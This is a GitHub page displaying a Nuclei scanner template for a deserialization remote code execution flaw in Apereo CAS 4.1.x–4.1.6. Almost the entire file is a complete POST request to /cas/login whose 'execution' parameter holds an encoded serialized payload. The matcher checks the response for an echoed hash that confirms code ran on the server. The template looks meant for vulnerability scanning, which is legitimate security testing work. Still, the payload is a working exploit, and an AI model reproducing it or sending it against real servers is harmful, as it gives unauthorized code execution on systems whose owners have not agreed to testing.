-
Notifications
You must be signed in to change notification settings - Fork 9
/
Apereo-Cas-rce.yaml
27 lines (23 loc) · 4.05 KB
/
Apereo-Cas-rce.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
id: Apereo-Cas-rce
info:
name: Apereo 4.1.X~4.1.6版本反序列化命令执行
author: Str1am
severity: high
tags: Apereo,Cas,rce
requests:
- raw:
- |
POST /cas/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
execution=7b951c2a-e78f-4286-95fe-970782352a84_AAAAIgAAABByzX2CboJrokE9fWsjmpIfAAAABmFlczEyOD2qXDuzMCkfiJJ8HeHT2H6viiIlis3R%0D%0AiWWuxz3YPz%2FvvliioTYKpjOV6lXkIotX%2B1a2BCc4tMGGt1TftfMxODZWE4PDkeVLlBJOK4gRqem9%0D%0A1dp1Gs9D1zcQ3fXDNkktLoIujk6Fbl%2Bacugm1fSV3u4KsdIUBvE3LR9HlQcZ0JwRaQPpgD%2B3kMLl%0D%0Ari%2FYaiecyMsEKm6F3HRidykv%2FeQVS3pPGnt0i%2F%2BSsSJROL6HBpB4GYSJgENMq9LIvP7SWtmy0yK%2B%0D%0AiPltKVCDwj2LkSnORmDyAfm7szY5Akspbl4t%2FRDYji6AhGtiZzcYzEjJJjMZMKd%2FijIhy20KEc2m%0D%0Ab21YnIOm1YJ8uSYvTSJAhISVSEFjmigt4EfQbyIv1cL3%2FYJabJI3E9wzyZCX5rNE4J5i14lAY3Cz%0D%0AZC%2F4pxOahl%2FyV9v2ZwX%2FjlYQN2FVNvOzt0pewk0g9HK9CgN5EcebyEVpbgCnfuizX916B8P37ru1%0D%0ABq613dkyAP29EEiFVBpMwqe0sg0%2Ba%2Fm4u3yi6UoXZ%2FnWWrJvxOUrD%2BLEGGfI8ksGxdiZJlztydr8%0D%0AjMkAG%2BAHP4GbmStnoQh3iEdyrLNWpO7RofNo3qqwkb5lMZhRH1jW3Cmqvm8oOT%2Bbl9T7gezAIV1V%0D%0ALKaBtI%2F%2Fn20fXoB5VB%2FyNYtjoiX2BMhB5Vtkqj2XXsMkjOGBznYi53sqXTLDLS3BQ6crQdqWo02E%0D%0ApFBLdcsWGM1AqS9%2BENCpV62bqEqIb%2FcJnlGIuV%2FylX%2FEOpmlP74RqbEh1%2Br%2BuPTyDD8BBY7LOxg3%0D%0AbKazlaxbLVnR2gcxYmpqh6NrxqHgb3f3Hq%2B9hwwx%2BYgYv%2BhbmtfjsOZDJodoQN36zAZ%2BXfAUuvM2%0D%0AWXVU38iElGFWq3Enem7eeUxhqghDvPjSepYVr%2BrUxCqFDBij12VKBS5DUdE0AbTeQoLHXMT4Kv2f%0D%0AXEdYmpu2JaYhNezYpBI74bvH6swD9v%2BlfTMLUdn6UyFkqRH7trNIAZP%2F%2BlLnMjLVyvMWUZ8w3DUs%0D%0A9qBgtRAJqeSxEMweB0Ap1d65p%2BJ0txPt8OxL8dUtugChxO%2Fne9TynrFQ9A%2BgfRIP%2BlcIljwrA1X%2F%0D%0Aw2JE2JiLHPF%2FR%2BnWyG62qdxl8SZCyVkIFmOIsLVfuABhYmsB0Z6EX85Wb84MakYSVn0dR1UTmxwq%0D%0Ayd0PH0k1RxiJXGKmYm9R7Lviw%2B2otUE71XaQrbW46eVJcrK%2Fr8%2B3Gd8l6tb7WgD5IPCct%2FvIlydH%0D%0AbRsGQ%2FsqwPtjit1pHTrSTETS40VvEf2aesJdxRk07HNU7D2msg82Q39ReXpuDkCZbqBnuKQoxtN3%0D%0A1DMWhFvWU%2BeG2XuKSlPzC7pQ5EsYbvkEHSRLloFAFxWmzSbMliwfVtyXFZTyN28Z6WNK%2Bn5cN%2FUd%0D%0AKLuyZxGMk4k9ZJozHfWivu3b8%2FtM1UzHMiLPwvUg8rNgLdJzOQeCUu03OBahpwCZowWis1NLYf4J%0D%0A3bqDWk3pQTRLo5hMdxjc%2Ft2kTe7ED5omWrnJNXqp%2B3iRP3%2FXdF0UKpgJaphqQCEGV9OJ3bvPZE%2Bw%0D%0AL20KgEKrbnrELepw8BE%2BHHpczngA0uGdUC%2Bbg0fuyBChrb6t9eeKRP9kI%2B%2FI0t7hY97WP4uopeJU%0D%0AGY2f%2Fmi0mU2mrBwBORkme%2B8GDx1cdBwV0gCaSYKvot%2BrF0W99O05mkADWKJ7rBBV21Tqc5NjL0cr%0D%0AGapMc8%2BznbG5us8eWZUAlXEAjRH9VGhahnC05tchqkOrqbawCpGHvYpbNchDH68kiKheGnI4HYTF%0D%0A6ZKQH6HyVII57DSZVALO%2BaD1bwxqbosWGF1YzcjQrmpFhnRbIgF1n1UTkJ6WSveI9TaF%2Fs%2FnZpVj%0D%0ArSyoFVnqXoG%2FObEkIonRLVTAjv7JbCmJsTaDu0JzsZ2J7uuwS9FpEnAB%2BfO40eBRZnBGiBIgUAbm%0D%0AiVen1oaWWyUT%2FhyKUYvMhHtMAF%2F5GKpqnVV0YoeDYFs0MIIotNqtza574Y1M8Ae5PTHxI5jZrAy3%0D%0AIwvvMHBzRC8C%2F1h1lWoqj7lU4Mr4mLVCsKnsmT9K9BNn3CsfhvKIBDA4VPRSUwIMdQrkzHWmAsZ3%0D%0AFpLec5RFnzHYe31pcELfSKBnmnBbQkiL6aVgPGlEvUQA5faPDY%2BKZ40OEH%2FmNaVxlQHVqKIz26HI%0D%0AFJQ5TWwVOLRJsIDVEEaX%2Bjqr7YU%2B9wqag9RLL72dYl7sAhJ12zh56W82yQ2WvOJALkjJqHy%2FiC10%0D%0A2%2BXyPd67KghcyGBaOXQNvDon9Ie2fXhwvOxh5OijNI4VR9aqNbMGE%2FWqw962pRkBrxIPSkjJvxJX%0D%0AZURhGoSD%2FopB33YK503rpWAvfZqa0p%2F2hMlr%2BdxpIajFuN4lXhLruYRCoj4aLkkLopAV%2FAttlxWK%0D%0Aq6JWN71Fe3PzOxN0Tpp3WQ51OGGup%2B%2Bvhu2Re%2BVSXquAROOxjIxZ83o92Gxid4rq5t7opYq05wN6%0D%0A2MaHbXYBXRNuh7LPRq%2FELJ0hf6wmvrQWyW6GlHTK4YIWo9M2zFkTpQcbwHWtO4rllnfZ%2FLSD%2BDME%0D%0AlfHIGPPQ%2Fa8CO6%2FKz0RhUD1ZFZICEzZVnUTQvdy76IpztpRS6C5j%2FFuKKlI0YRC8EkQHtqFdqsdT%0D%0AV1EWgND%2BpNwMoA0aXQsDLNLdUngLsmhYsMK5Vex2o3DTVbZNS1UeDiQ%2FfaoPddtUYD40lmTT9zYt%0D%0AUJHY6e9ASbrvJKmnjQVN5FN5hJivx5g5LYJxZ9nRNNO%2BmiaiwtJvxPkc8c%2BxJZmzzo7cEUxrCnn7%0D%0AoS7oTTEC8k6U57TUadxlMui383uDpdIqkC2YT2tFDUlbpxQLLUFCHyN3iRw7Y7IU5KRQCYgkWz8X%0D%0AKIqyJhIR7gEV3AtG%2FUj5ZE5J2mRv%2F%2F%2Buq35KaWeWczRjkBMK9FHeC5eujArEJmiSyVFIvHOcAwgN%0D%0AF0n4jD7kcRJIdEEL1EcyJo%2B9q5Dg3xJThcsywcddLX48Nqa7KSWGsg3kawaNm4Dq8Vyp&password=Test1234&_eventId=submit<=LT-215706-O4ejY5ldDQpHMB9WdQbe0trNaM28Wf-cas01.example.org&username=13222233322
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "21232f297a57a5a743894a0e4a801fc3"
part: body
condition: and